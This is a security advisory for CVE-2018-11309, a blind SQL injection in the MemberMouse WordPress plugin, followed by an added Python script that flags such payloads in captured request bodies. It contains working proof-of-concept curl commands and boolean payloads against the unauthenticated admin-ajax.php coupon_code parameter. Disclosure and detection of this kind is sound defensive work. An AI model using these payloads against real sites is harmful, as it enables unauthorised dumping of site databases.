
CVE-2018-11309 - Blind SQL Injection in MemberMouse plugin

Intro

Blind SQL injection in coupon_code in the MemberMouse plugin 2.2.8 and prior for WordPress allows an unauthenticated attacker to dump the WordPress MySQL database via an admin-ajax.php request.

Full disclosure

It was possible to detect a blind SQL Injection inside the coupon validation form:

[Screenshot: coupon validation form]

Affected Page: https://vulnerable.wordpress/wp-admin/admin-ajax.php
CVSSv3 Score: 8.6 (High)
CVSSv3 Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
Vulnerable Parameter: coupon_code
Description:
The target query for this PoC is select @@version.
It was possible to detect the vulnerability using the following payload:

'+or+substring(@@version,1,1)%3d'5

The web application answered in this way:
[Screenshot: application response to the true condition]

The complete curl command:

curl -i -s -k  -X $'POST' \
    --data-binary $'mm_action=applyCoupon&product_price=95&coupon_code=\'+or+substring(@@version,1,1)%3d\'5&product_id=2&method=performAction&action=module-handle&module=MM_CheckoutView' \
    $'https://vulnerable.wordpress/wp-admin/admin-ajax.php'

In order to trigger the always false condition, the following payload was used:

'+or+substring(@@version,1,1)%3d'@

The response:

[Screenshot: application response to the false condition]

The complete curl command:

curl -i -s -k  -X $'POST' \
    --data-binary $'mm_action=applyCoupon&product_price=95&coupon_code=\'+or+substring(@@version,1,1)%3d\'@&product_id=2&method=performAction&action=module-handle&module=MM_CheckoutView' \
    $'https://vulnerable.wordpress/wp-admin/admin-ajax.php'

In this brief example it was possible to identify the first character of the database version banner, ‘5’ in this case. However, it would be very easy to dump the entire database.
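As an added example that is not part of the original advisory, the following Python script shows how a defender can flag the boolean-based payload shape shown above in captured POST bodies sent to admin-ajax.php. Request bodies are not present in a standard web-server access log, so the input is assumed to come from a WAF or ModSecurity-style audit log that records them. The sample bodies are constructed for this example (two of them mirror the true/false payloads from the curl commands above, two are benign coupon codes), and the regular expression is a heuristic chosen here, not a rule from the advisory or the plugin.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs

# Constructed sample request bodies for admin-ajax.php (not taken from any real log).
# Entries 1 and 2 reproduce the shape of the advisory's true/false payloads;
# entries 0 and 3 are benign coupon codes (entry 3 contains a legitimate apostrophe).
SAMPLE_BODIES = [
    "mm_action=applyCoupon&product_price=95&coupon_code=SPRING20&product_id=2"
    "&method=performAction&action=module-handle&module=MM_CheckoutView",
    "mm_action=applyCoupon&product_price=95&coupon_code='+or+substring(@@version,1,1)%3d'5"
    "&product_id=2&method=performAction&action=module-handle&module=MM_CheckoutView",
    "mm_action=applyCoupon&product_price=95&coupon_code='+or+substring(@@version,1,1)%3d'@"
    "&product_id=2&method=performAction&action=module-handle&module=MM_CheckoutView",
    "mm_action=applyCoupon&product_price=95&coupon_code=O%27BRIEN10&product_id=2"
    "&method=performAction&action=module-handle&module=MM_CheckoutView",
]

# Heuristic (an assumption of this example): a quote that breaks out of the string
# literal, followed by a boolean operator, and then either a comparison operator, a
# MySQL system variable (@@...) or a function commonly seen in blind probes.
SQLI_PATTERN = re.compile(
    r"""['"]\s*(?:or|and)\b.*?(?:[=<>]|\blike\b|@@|\b(?:substring|substr|mid|sleep|benchmark)\s*\()""",
    re.IGNORECASE | re.DOTALL,
)


def extract_coupon_code(body: str) -> Optional[str]:
    """Return the URL-decoded coupon_code value of a form-encoded body, or None if absent.

    parse_qs turns '+' into a space and decodes %3d into '=', which is exactly the
    transformation the vulnerable endpoint would apply before the value reaches SQL.
    """
    params = parse_qs(body, keep_blank_values=True)
    values = params.get("coupon_code")
    return values[0] if values else None


def is_suspicious(coupon_code: str) -> bool:
    """True when the decoded coupon_code matches the boolean-injection heuristic."""
    return SQLI_PATTERN.search(coupon_code) is not None


def scan(bodies: List[str]) -> List[Tuple[int, Optional[str], bool]]:
    """Score every body; returns (index, decoded coupon_code, flagged)."""
    results = []
    for idx, body in enumerate(bodies):
        code = extract_coupon_code(body)
        results.append((idx, code, code is not None and is_suspicious(code)))
    return results


if __name__ == "__main__":
    for idx, code, flagged in scan(SAMPLE_BODIES):
        print(f"request {idx}: coupon_code={code!r} -> {'ALERT' if flagged else 'ok'}")
```

The check is deliberately run on the decoded value rather than the raw body, because the raw form uses `+` and `%3d` and a naive substring match on `' or ` would miss it. The benign `O'BRIEN10` case shows why the pattern requires an operator after the quote instead of alerting on any apostrophe; that keeps legitimate coupon codes from producing false positives. A longer-term fix on the plugin side is to pass coupon_code through a prepared statement rather than concatenating it into the query, which removes the injection regardless of encoding.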

No additional exploitation tests were made in respect of the infrastructure; however, if the entire WordPress database were dumped, a hypothetical attacker could compromise the entire website.